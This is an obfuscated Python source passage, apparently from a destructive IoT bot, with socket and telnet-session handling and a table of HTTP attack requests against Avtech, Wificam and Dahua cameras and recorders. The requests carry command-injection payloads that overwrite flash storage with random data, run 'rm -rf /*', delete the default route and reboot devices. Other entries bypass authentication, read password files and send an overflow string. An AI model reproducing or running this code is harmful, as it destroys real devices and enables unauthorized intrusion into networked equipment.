     IiiI [ i1i11II1i ] += O0
5913
     if 34 - 34: oOOo0000o . OOooOO0 / Ii11i1iIi + Oo0Oo
5914
     try :
5915
      O0 = re . sub ( '[\x00-\x1f]' , '' , O0 ) ;
5916
      O0O0 . send ( O0 )
5917
     except :
5918
      pass
5919
      if 11 - 11: oOOo0000o
5920
     if '\n' in o0ii1iiIIIIi1i [ i1i11II1i ] or '\r' in o0ii1iiIIIIi1i [ i1i11II1i ] :
5921
      I1i1111i111i [ i1i11II1i ] = 3
5922
      o0ii1iiIIIIi1i [ i1i11II1i ] = ''
5923
      try :
5924
       O0O0 . send ( '\r\n' )
5925
      except :
5926
       pass
5927
      continue
5928
      if 25 - 25: o0oooooO % O0oo / i1IIi1i1iiI . Oo0Oo - O0oo0OOOOO00 / i1IIi1i1iiI
5929
    if I1i1111i111i [ i1i11II1i ] == 4 :
5930
     if 85 - 85: i1 % Ii11i1iIi / i1IIi1i1iiI % IIiIIiIii1I
5931
     IiiI [ i1i11II1i ] += O0
5932
     if 84 - 84: oOOo0000o + i1 + i1IIi1i1iiI . O0oo % IIiII * oOoO0Ooo
5933
     if '\n' in o0ii1iiIIIIi1i [ i1i11II1i ] or '\r' in o0ii1iiIIIIi1i [ i1i11II1i ] :
5934
      o0ii1iiIIIIi1i [ i1i11II1i ] = ''
5935
      I1i1111i111i [ i1i11II1i ] = 5
5936
      continue
5937
      if 42 - 42: IIiIIiIii1I
5938
    if I1i1111i111i [ i1i11II1i ] == 6 :
5939
     i1I1iiIII11 ( O0O0 )
5940
     continue
5941
     if 73 - 73: Oo0Oo + IIiIIiIii1I
5942
   else :
5943
    i1I1iiIII11 ( O0O0 )
5944
    continue
5945
  if O0O0 in O0o0 :
5946
   if I1i1111i111i [ i1i11II1i ] == - 1 :
5947
    if 60 - 60: i1IIi1i1iiI . IIiIii1iI - IIiIIiIii1I / OOooOO0 / OOOoOooO % O0oo
5948
    if 66 - 66: i1IIi1i1iiI * Oo0
5949
    if 93 - 93: Oo0 - OOOoOooO / IIiIIiIii1I . O0oo0OOOOO00 * o0ooO
5950
    if 96 - 96: Oo0Oo . o0oooooO + OOOoOooO - oOOo0000o * I11I1Ii
5951
    if 84 - 84: O0oo * i1 / Oo0 + I11I1Ii . oOOoO00oo0
5952
    if 31 - 31: Ii11i1iIi + Oo0
5953
    try :
5954
     if 32 - 32: i1IIi1i1iiI
5955
     O0O0 . send ( '\xff\xfb\x03\xff\xfb\x01\xff\xfd\x1f\xff\xfd\x18' )
5956
    except :
5957
     i1I1iiIII11 ( O0O0 )
5958
     continue
5959
    I1i1111i111i [ i1i11II1i ] = 0
5960
    continue
5961
   if I1i1111i111i [ i1i11II1i ] == 1 :
5962
    if 39 - 39: Ii / O0oo . OOOoOooO . OOOoOooO
5963
    try :
5964
     if 87 - 87: IIiIIiIii1I * OOOoOooO + Ii % o0oooooO / O0oo
5965
     O0O0 . send ( oOo0oO000 [ i1i11II1i ] [ 2 ] )
5966
    except :
5967
     i1I1iiIII11 ( O0O0 )
5968
     continue
5969
    I1i1111i111i [ i1i11II1i ] = 2
5970
    continue
5971
   if I1i1111i111i [ i1i11II1i ] == 3 :
5972
    if 53 - 53: Oo0Oo + oOoO0Ooo
5973
    try :
5974
     if 67 - 67: i1IIi1i1iiI % oOOo0000o + o0oooooO + i1IIi1i1iiI
5975
     O0O0 . send ( oOo0oO000 [ i1i11II1i ] [ 3 ] )
5976
    except :
5977
     i1I1iiIII11 ( O0O0 )
5978
     continue
5979
    I1i1111i111i [ i1i11II1i ] = 4
5980
    continue
5981
   if I1i1111i111i [ i1i11II1i ] == 5 :
5982
    i1I1iiiI1iI = '\r\nLogin incorrect. Try again.\r\n'
5983
    try :
5984
     if 98 - 98: OOOoOooO * oOOoO00oo0 . OOooOO0 / I11I1Ii % O0oo0OOOOO00 / i1IIi1i1iiI
5985
     O0O0 . send ( i1I1iiiI1iI )
5986
    except :
5987
     i1I1iiIII11 ( O0O0 )
5988
     continue
5989
    I1i1111i111i [ i1i11II1i ] = 6
5990
    if 19 - 19: OOooOO0 + O0oo0OOOOO00 * i1IIi1i1iiI
5991
    continue
5992
    if 15 - 15: I11I1Ii . o0ooO
5993
    if 32 - 32: O0oo
5994
   if I1i1111i111i [ i1i11II1i ] == 0 :
5995
    OoO0oOoooo = iIIiiIiI
5996
    if Iioo0OooOoO - O0O0o00 [ i1i11II1i ] > OoO0oOoooo :
5997
     o0ii1iiIIIIi1i [ i1i11II1i ] = ''
5998
     I1i1111i111i [ i1i11II1i ] = 1
5999
     continue
6000
     if 78 - 78: O0oo + OOOoOooO
6001
  OoO0oOoooo = i1111iI
6002
  if Iioo0OooOoO - O0O0o00 [ i1i11II1i ] > OoO0oOoooo :
6003
   if 44 - 44: O0oo0OOOOO00 % Oooo / Ii11i1iIi . i1IIi1i1iiI
6004
   i1I1iiIII11 ( O0O0 )
6005
   continue
6006
   if 55 - 55: oOOoO00oo0 - Oooo - OOooOO0 * IIiIii1iI
6007
   if 19 - 19: Ii11i1iIi / Ii % I11I1Ii . O0oo . Oo0Oo . O0oo
6008
   if 25 - 25: Oo0Oo + i1IIi1i1iiI / OOooOO0 - o0ooO * i1
6009
   if 61 - 61: i1 . o0ooO . IIiIii1iI / OOooOO0
6010
   if 36 - 36: IIiIii1iI - Ii
6011
   if 5 - 5: o0oooooO + i1
6012
   if 67 - 67: I11I1Ii / OOooOO0 * i1 + O0oo0OOOOO00 * o0oooooO / Ii11i1iIi
6013
   if 22 - 22: O0oo0OOOOO00 % IIiIIiIii1I - OOOoOooO + oOOoO00oo0 + Oo0Oo
6014
   if 88 - 88: IIiII
6015
   if 41 - 41: OOooOO0 - IIiII
6016
Ii11iIIiI1I1 = 20
6017
OO0Oo0 = 120
6018
if 75 - 75: I11I1Ii % oOOoO00oo0 / oOOo0000o
6019
i1Iiii1i11i = 95
6020
if 19 - 19: O0oo / i1
6021
OoO000oo0ooO = 500
6022
if 77 - 77: OOOoOooO
6023
if 53 - 53: Ii
6024
if 80 - 80: i1IIi1i1iiI / oOoO0Ooo - Oo0 . oOoO0Ooo + Ii11i1iIi / i1IIi1i1iiI
6025
if 86 - 86: i1 % i1 / i1 % O0oo - OOooOO0 + Oo0
6026
O00OiiI1iIiiI = [ ]
6027
Oooo0 = { }
6028
I1iiO000o00o0 = { }
6029
if 86 - 86: OOooOO0 . o0oooooO % O0oo0OOOOO00 % i1 + i1IIi1i1iiI - Ii
6030
Iii1iiiI = { }
6031
if 30 - 30: Oo0Oo
6032
i1I11IIIIIi = { }
6033
if 3 - 3: o0ooO * IIiIIiIii1I % Ii * i1
6034
iIIiii11Ii1 = [ ]
6035
ooOo0I1ii1i = { }
6036
IiI1i1ii1 = { }
6037
if 19 - 19: i1IIi1i1iiI * Oo0Oo
6038
oo0 = { }
6039
iIoO000oO = { }
6040
if 5 - 5: o0oooooO * i1 - Ii * IIiIii1iI - Oo0Oo
6041
if 30 - 30: oOoO0Ooo - Oo0 - Oooo
6042
if 86 - 86: I11I1Ii
6043
iI1iiIi1i = 'GET ../////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// HTTP/1.0\r\n\r\n'
6044
if 20 - 20: O0oo / Oooo * Oo0 * i1IIi1i1iiI / Ii11i1iIi
6045
if 49 - 49: i1IIi1i1iiI + IIiIii1iI % o0oooooO
6046
def IIi1IIii11I1I ( targetip , targetport ) :
6047
 if 12 - 12: i1IIi1i1iiI * IIiIIiIii1I / Ii - oOoO0Ooo % Ii
6048
 global i1Iiii1i11i
6049
 if 1 - 1: oOOo0000o + Oooo / Oo0Oo + o0ooO - OOOoOooO * IIiII
6050
 if 77 - 77: o0oooooO % o0ooO
6051
 if 97 - 97: O0oo / IIiIii1iI / Ii * I11I1Ii
6052
 if 24 - 24: Oo0 . oOOo0000o - Oo0Oo
6053
 O0000oO0O = ( targetip , int ( targetport ) )
6054
 I11i1I = hash ( O0000oO0O )
6055
 if I11i1I in iIIiii11Ii1 :
6056
  if 18 - 18: I11I1Ii
6057
  return ;
6058
  if 54 - 54: IIiIIiIii1I - Oooo + O0oo0OOOOO00 . OOOoOooO
6059
  if 82 - 82: Oooo . Oo0Oo + IIiIii1iI / OOooOO0
6060
 IiI1i1ii1 [ I11i1I ] = 0
6061
 ooOo0I1ii1i [ I11i1I ] = ( targetip , int ( targetport ) )
6062
 oo0 [ I11i1I ] = time . time ( ) + ( i1Iiii1i11i * 60 )
6063
 iIoO000oO [ I11i1I ] = None
6064
 iIIiii11Ii1 . append ( I11i1I )
6065
 if 19 - 19: oOOo0000o
6066
def i1iiiiIi ( targetip , targetport , jobhash ) :
6067
 O0000oO0O = ( targetip , int ( targetport ) )
6068
 if 23 - 23: i1IIi1i1iiI . IIiIii1iI / oOOoO00oo0 * Oooo / O0oo
6069
 O0OOo00o00o = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
6070
 O0OOo00o00o . setblocking ( 0 )
6071
 if 2 - 2: O0oo % I11I1Ii * oOoO0Ooo / O0oo
6072
 try :
6073
  O0OOo00o00o . connect ( O0000oO0O )
6074
 except :
6075
  pass
6076
  if 25 - 25: o0ooO + Ii
6077
 I11i1I = hash ( O0OOo00o00o )
6078
 O00OiiI1iIiiI . append ( O0OOo00o00o )
6079
 Oooo0 [ I11i1I ] = ( targetip , int ( targetport ) )
6080
 Iii1iiiI [ I11i1I ] = 0
6081
 if 76 - 76: IIiIii1iI * I11I1Ii * IIiIii1iI
6082
 if 53 - 53: IIiIIiIii1I
6083
 i1I11IIIIIi [ I11i1I ] = time . time ( )
6084
 I1iiO000o00o0 [ I11i1I ] = jobhash
6085
 iIoO000oO [ jobhash ] = O0OOo00o00o
6086
 if 7 - 7: i1IIi1i1iiI % o0ooO - oOOo0000o + Oo0 * oOoO0Ooo
6087
 return O0OOo00o00o
6088
 if 48 - 48: O0oo0OOOOO00 % Ii * I11I1Ii
6089
def i1ii1iIII ( webhash ) :
6090
 if 83 - 83: OOOoOooO * i1IIi1i1iiI - OOOoOooO . O0oo
6091
 if 76 - 76: o0ooO + IIiIIiIii1I + oOOoO00oo0 - oOoO0Ooo
6092
 if 70 - 70: o0ooO * i1 * Oo0
6093
 if 6 - 6: OOooOO0 + oOoO0Ooo . i1 % Oooo
6094
 if 17 - 17: IIiIii1iI + IIiIIiIii1I / i1
6095
 IiI1i1ii1 [ webhash ] = None
6096
 ooOo0I1ii1i [ webhash ] = None
6097
 oo0 [ webhash ] = None
6098
 iIoO000oO [ webhash ] = None
6099
 if 84 - 84: O0oo0OOOOO00 - O0oo0OOOOO00 . Oo0 % IIiII - OOooOO0 + oOOoO00oo0
6100
 iIIiii11Ii1 . remove ( webhash )
6101
 if 87 - 87: OOooOO0 + O0oo0OOOOO00 - I11I1Ii % OOOoOooO
6102
def O00oO ( sock ) :
6103
 global OoO000oo0ooO
6104
 global OO0Oo0
6105
 global Ii11iIIiI1I1
6106
 if 16 - 16: O0oo
6107
 I11i1I = hash ( sock )
6108
 iiIii1I1i1 = I1iiO000o00o0 [ I11i1I ]
6109
 if 96 - 96: o0oooooO . Ii11i1iIi - i1IIi1i1iiI % Ii11i1iIi * i1IIi1i1iiI + Oo0Oo
6110
 try :
6111
  sock . close ( )
6112
 except :
6113
  pass
6114
  if 42 - 42: oOOo0000o / I11I1Ii . Oo0Oo % o0oooooO
6115
  if 59 - 59: oOOoO00oo0 % Oooo / OOOoOooO - o0oooooO / IIiII
6116
  if 27 - 27: O0oo0OOOOO00 + OOOoOooO * o0ooO / Oo0Oo . Oo0Oo
6117
 Iioo0OooOoO = time . time ( )
6118
 if oo0 [ iiIii1I1i1 ] <= Iioo0OooOoO :
6119
  oo0 [ iiIii1I1i1 ] = time . time ( ) + OO0Oo0
6120
 iIoO000oO [ iiIii1I1i1 ] = None
6121
 IiI1i1ii1 [ iiIii1I1i1 ] += 1
6122
 if 91 - 91: oOoO0Ooo
6123
 O00OiiI1iIiiI . remove ( sock )
6124
 Oooo0 [ I11i1I ] = None
6125
 Iii1iiiI [ I11i1I ] = None
6126
 if 78 - 78: o0oooooO . IIiIii1iI / OOooOO0
6127
 if 4 - 4: Ii11i1iIi / oOOoO00oo0 . Oooo
6128
 i1I11IIIIIi [ I11i1I ] = None
6129
 I1iiO000o00o0 [ I11i1I ] = None
6130
 if 35 - 35: o0oooooO + O0oo
6131
def IIi1IIIIIi ( ) :
6132
 global xmpinpayloads
6133
 global OoO000oo0ooO
6134
 if 46 - 46: Oo0 / I11I1Ii
6135
 Iioo0OooOoO = time . time ( )
6136
 OO00ooo0 = iIIiii11Ii1
6137
 for IIIiiiI in OO00ooo0 :
6138
  iiIii1I1i1 = hash ( IIIiiiI )
6139
  if 14 - 14: IIiII . o0ooO + Oooo
6140
  if iIoO000oO [ iiIii1I1i1 ] == None :
6141
   if 48 - 48: OOooOO0 * oOOoO00oo0 * OOooOO0
6142
   if IiI1i1ii1 [ iiIii1I1i1 ] >= OoO000oo0ooO :
6143
    if 31 - 31: Ii
6144
    i1ii1iIII ( iiIii1I1i1 )
6145
    continue
6146
    if 38 - 38: O0oo0OOOOO00 / oOoO0Ooo
6147
    if 7 - 7: IIiIii1iI * OOooOO0
6148
   if Iioo0OooOoO >= oo0 [ iiIii1I1i1 ] :
6149
    if 52 - 52: IIiIIiIii1I * i1IIi1i1iiI
6150
    O0OOo00o00o = i1iiiiIi ( ooOo0I1ii1i [ iiIii1I1i1 ] [ 0 ] , ooOo0I1ii1i [ iiIii1I1i1 ] [ 1 ] , iiIii1I1i1 )
6151
    iIoO000oO [ iiIii1I1i1 ] = O0OOo00o00o
6152
    oo0 [ iiIii1I1i1 ] = 0
6153
    if 79 - 79: i1IIi1i1iiI % o0oooooO - IIiIii1iI % I11I1Ii
6154
    if 36 - 36: i1 . Oo0Oo % o0oooooO / IIiII . o0oooooO
6155
def IIIiOoOO ( sock , webhash , jobhash ) :
6156
 global iI1iiIi1i
6157
 try :
6158
  if 30 - 30: oOOoO00oo0
6159
  sock . send ( iI1iiIi1i )
6160
 except :
6161
  pass
6162
  if 15 - 15: oOOo0000o * Ii % o0ooO . o0ooO % i1
6163
 return 1
6164
 if 92 - 92: oOOo0000o
6165
def iI11IiI1 ( ) :
6166
 global Ii11iIIiI1I1
6167
 global xmpinclient_maxconnectiontime_payload
6168
 if 2 - 2: Ii * Oo0 - Ii . OOOoOooO
6169
 Iioo0OooOoO = time . time ( )
6170
 if 63 - 63: o0oooooO / Oo0Oo + OOooOO0 % oOOo0000o
6171
 if 16 - 16: I11I1Ii / OOOoOooO - i1 + Oo0 - oOOo0000o . O0oo0OOOOO00
6172
 O00Oo = 0.01
6173
 IIiI1i , O0o0 , IiIIiI11I = select . select ( O00OiiI1iIiiI , O00OiiI1iIiiI , [ ] , O00Oo )
6174
 for O0O0 in O00OiiI1iIiiI :
6175
  I11i1I = hash ( O0O0 )
6176
  o0oo0OOOo = O0O0 . getsockopt ( socket . SOL_SOCKET , socket . SO_ERROR )
6177
  if o0oo0OOOo != 0 :
6178
   if 89 - 89: o0ooO - O0oo0OOOOO00 * oOoO0Ooo / oOOoO00oo0 . oOOoO00oo0 / IIiIIiIii1I
6179
   O00oO ( O0O0 )
6180
   continue
6181
  if O0O0 in IIiI1i :
6182
   O0 = ''
6183
   try :
6184
    O0 = O0O0 . recv ( 2048 )
6185
   except :
6186
    pass
6187
   if O0 :
6188
    pass
6189
    if 75 - 75: OOOoOooO / IIiII + Oo0
6190
    if 10 - 10: Oo0 + Ii . Oooo % oOOo0000o - oOOoO00oo0 + IIiIIiIii1I
6191
    if 40 - 40: Oooo
6192
    if 44 - 44: OOOoOooO - i1 + O0oo / Oo0
6193
    if 50 - 50: I11I1Ii % O0oo - oOOoO00oo0
6194
    if 67 - 67: Ii11i1iIi - Ii11i1iIi * Oo0 . IIiIIiIii1I + Oo0Oo
6195
    if 92 - 92: Oo0Oo - IIiIIiIii1I
6196
    if 96 - 96: i1IIi1i1iiI - O0oo0OOOOO00 - Oo0Oo * Ii * i1IIi1i1iiI + OOooOO0
6197
    if 78 - 78: o0oooooO - oOoO0Ooo / IIiII
6198
    if 48 - 48: o0oooooO . Ii11i1iIi - oOOo0000o % o0ooO * O0oo - OOooOO0
6199
   else :
6200
    O00oO ( O0O0 )
6201
    continue
6202
  if O0O0 in O0o0 :
6203
   if Iii1iiiI [ I11i1I ] == 0 :
6204
    if 71 - 71: oOOoO00oo0 . Oo0 % OOooOO0 / IIiIii1iI * Oo0Oo
6205
    iiIii1I1i1 = I1iiO000o00o0 [ I11i1I ]
6206
    IIIiOoOO ( O0O0 , I11i1I , iiIii1I1i1 )
6207
    Iii1iiiI [ I11i1I ] = 1
6208
    if 70 - 70: o0ooO
6209
  OoO0oOoooo = Ii11iIIiI1I1
6210
  iiIii1I1i1 = I1iiO000o00o0 [ I11i1I ]
6211
  if Iioo0OooOoO - i1I11IIIIIi [ I11i1I ] > OoO0oOoooo :
6212
   if 30 - 30: o0ooO * Ii11i1iIi + O0oo * Oo0Oo / OOooOO0 - o0oooooO
6213
   O00oO ( O0O0 )
6214
   continue
6215
   if 58 - 58: i1IIi1i1iiI % Ii11i1iIi - o0ooO + IIiIIiIii1I
6216
   if 48 - 48: oOOo0000o % Oooo
6217
   if 95 - 95: o0oooooO - o0ooO * oOOo0000o . i1
6218
   if 54 - 54: Ii + O0oo0OOOOO00 - Oo0 - i1IIi1i1iiI % O0oo / OOooOO0
6219
   if 41 - 41: Oo0 + oOoO0Ooo . Oo0Oo
6220
   if 93 - 93: Oo0 * IIiIIiIii1I % OOooOO0 . o0ooO / O0oo / Ii
6221
   if 79 - 79: IIiIIiIii1I % oOoO0Ooo
6222
   if 43 - 43: o0oooooO + Ii11i1iIi * O0oo
6223
   if 93 - 93: oOOo0000o / Ii11i1iIi
6224
   if 62 - 62: i1IIi1i1iiI / o0ooO
6225
   if 85 - 85: Oo0Oo - OOOoOooO
6226
time . sleep ( 3 )
6227
if 11 - 11: oOoO0Ooo + O0oo0OOOOO00 / IIiIii1iI * o0ooO % Ii11i1iIi
6228
O0O = "SPLTX"
6229
if 90 - 90: o0oooooO / O0oo0OOOOO00 + o0ooO % o0oooooO . i1IIi1i1iiI
6230
if 76 - 76: Ii * O0oo
6231
if 44 - 44: IIiIii1iI
6232
if 88 - 88: i1 . IIiIIiIii1I * OOOoOooO + oOoO0Ooo % o0oooooO + Oo0
6233
if 39 - 39: i1IIi1i1iiI - IIiIIiIii1I
6234
IIIIiI = 60
6235
iI1iiii11I11I = 0.5
6236
if 3 - 3: oOOoO00oo0 % O0oo % Oo0 / Oo0 * Ii11i1iIi
6237
o0O0oO = [
6238
 [ 'avtech' , 'Linux.*UPnP.*Avtech' ,
6239
 'GET /cgi-bin/user/Config.cgi?/nobody&action=get&category=Account.* HTTP/1.0\r\n\r\n' ,
6240
'GET /cgi-bin/nobody/VerifyCode.cgi?account=%%CUSTOM1%%&login=quick HTTP/1.0\r\n\r\n' ,
6241
 'GET /cgi-bin/supervisor/CloudSetup.cgi?exefile=(cat%20/dev/urandom%20%3e/dev/mtdblock3%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock4%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock6%20%26);(cat%20/dev/urandom%20%3e/dev/sda2%20%26);((sleep%2017;route%20del%20default)%20%26) HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\n\r\n' ,
6242
 'POST /cgi-bin/supervisor/adcommand.cgi HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\nContent-Length: %%BODYLENGTH%%\r\n\r\nDoShellCmd "strCmd=(cat%20/dev/urandom%20%3e/dev/mtdblock3%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock4%20%26);(cat%20/dev/urandom%20%3e/dev/mtdblock6%20%26);(cat%20/dev/urandom%20%3e/dev/sda2%20%26);((sleep%2015;route%20del%20default)%20%26)&"' ,
6243
 'POST /cgi-bin/user/Config.cgi?/nobody HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=set&Network.BootProto=STATIC&Network.IPAddress=10.%%RAND8%%&Network.DefaultRouter=10.%%COMP8%%&Network.SubnetMask=255.255.255.0&Network.WebPort=%%RANDPORT%%&Network.DNSServer1=1.2.3.4&Network.DNSServer2=1.2.3.5' ,
6244
'POST /cgi-bin/user/Config.cgi HTTP/1.0\r\nCookie: SSID=%%CUSTOM1%%\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %%BODYLENGTH%%\r\n\r\naction=set&Network.BootProto=STATIC&Network.IPAddress=192.168.%%RAND16%%&Network.DefaultRouter=192.168.%%COMP16%%&Network.SubnetMask=255.255.255.0&Network.WebPort=%%RANDPORT%%&Network.DNSServer1=1.2.3.4&Network.DNSServer2=1.2.3.5&Network.UPNP.Enabled.OFF' ,
6245
'POST /cgi-bin/user/Config.cgi?action=set&Network.SMTP.Receivers=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA HTTP/1.0\r\n\r\n' ,
6246
 'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6247
 ] ,
6248
 [ 'wificam' , 'GoAhead-Webs.*WIFICAM' ,
6249
 'GET system.ini HTTP/1.0\r\n\r\n' ,
6250
 'GET login.cgi HTTP/1.0\r\n\r\n' ,
6251
 'GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&svr=192.168.1.1&port=21&user=ftp&pwd=$(cat%20/dev/urandom%20>/dev/root)&dir=/&mode=PORT&upload_interval=0\r\n\r\n' ,
6252
 'GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6253
'GET /set_network.cgi?next_url=rebootme.html&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&ipaddr=10.%%RAND8%%&mask=255.255.255.0&gateway=10.%%COMP8%%&dns1=1.2.3.4&dns2=1.2.3.5&dhcp=0&port=%%RANDPORT%%\r\n\r\n' ,
6254
 'GET /rebootme.htm?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6255
 'GET /reboot.cgi?next_url=reboot.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6256
 'GET /set_wifi.cgi?next_url=rebootme.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&enable=0&ssid=&mode=0&encrypt=0&authtype=0&keyformat=0&defkey=0&key1=&key2=&key3=&key4=&key1_bits=0&key2_bits=0&key3_bits=0&key4_bits=0&wpa_pask=&channel=0\r\n\r\n' ,
6257
 'GET /rebootme.htm?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6258
 'GET /reboot.cgi?next_url=reboot.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6259
'GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&svr=192.168.1.1&port=21&user=ftp&pwd=$(rm%20-rf%20/*)&dir=/&mode=PORT&upload_interval=0\r\n\r\n' ,
6260
 'GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6261
 'GET /set_ftp.cgi?next_url=ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&svr=192.168.1.1&port=21&user=ftp&pwd=$(reboot)&dir=/&mode=PORT&upload_interval=0\r\n\r\n' ,
6262
 'GET /ftptest.cgi?next_url=test_ftp.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6263
'GET /set_formatsd.cgi?next_url=recordsch.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6264
 'GET /recordsch.htm?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%\r\n\r\n' ,
6265
'GET /set_mail.cgi?next_url=mail.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&sender=a@a.com&receiver1=;route$IFSdel$IFSdefault&receiver2=&receiver3=&receiver4=&ssl=0&svr=smtp.google.com&smtpport=25&user=&pwd= HTTP/1.0\r\n\r\n' ,
6266
 'GET /mailtest.cgi?next_url=test_mail.html&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%% HTTP/1.0\r\n\r\n' ,
6267
'GET /decoder_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&command=26&onestep=0&11251251512431.21312321313&_=1489741007900\r\n\r\n' ,
6268
'GET /set_alias.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&alias=HACKED&next_url=alias.htm\r\n\r\n' ,
6269
 'GET /set_datetime.cgi?next_url=datetime.htm&loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&ntp_svr=1.2.3.4&tz=36000&ntp_enable=0\r\n\r\n' ,
6270
 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&param=2&value=0&15011526173000.9650471447315604&_=1501152617300\r\n\r\n' ,
6271
 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&param=1&value=0&15011526173000.9650471447315604&_=1501152617301\r\n\r\n' ,
6272
 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&param=9&value=0&15011526173000.9650471447315604&_=1501152617302\r\n\r\n' ,
6273
 'GET /camera_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&param=8&value=0&15011526173000.9650471447315604&_=1501152617303\r\n\r\n' ,
6274
 'GET /decoder_control.cgi?loginuse=%%LOGIN%%&loginpas=%%PASSWORD%%&command=94&onestep=0&11251251512431.21312321313&_=1489741007901\r\n\r\n' ,
6275
'GET / HTTP/1.1\r\nHost: %%TARGETIP%%\r\n\r\n' ,
6276
 ] ,
6277
 [ 'dahua' , '(["/=]more\.js|title>WEB SERVICE</title|css/fn.css|CPPLUS DVR|CONTENT-LENGTH:)' ,
6278
 'GET /current_config/passwd HTTP/1.0\r\n\r\n' ,
6279
 'POST /RPC2_Login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload\r\n\r\n{"method":"global.login","params":{"userName":"%%CUSTOM1%%","password":"","clientType":"Dahua3.0-Web3.0-NOTIE"},"id":10000}' ,
6280
 'POST /RPC2_Login HTTP/1.0\r\nContent-Type: application/x-www-form-urlencoded; charset=utf-8\r\nContent-Length: %%BODYLENGTH%%\r\nCookie: DHLangCookie30=%2Fweb_lang%2FEnglish.txt; DhWebSnapPath=C%3A%5CPictureDownload; DhWebRecordPath=C%3A%5CRecordDownload; DhWebClientSessionID=%%CUSTOM2%%\r\n\r\n {"method":"global.login","session":%%CUSTOM2%%,"params":{"userName":"%%CUSTOM1%%","password":"%%CUSTOM3%%","clientType":"Dahua3.0-Web3.0-NOTIE", "authorityType":"%%CUSTOM4%%"},"id":10000}' ,
6281
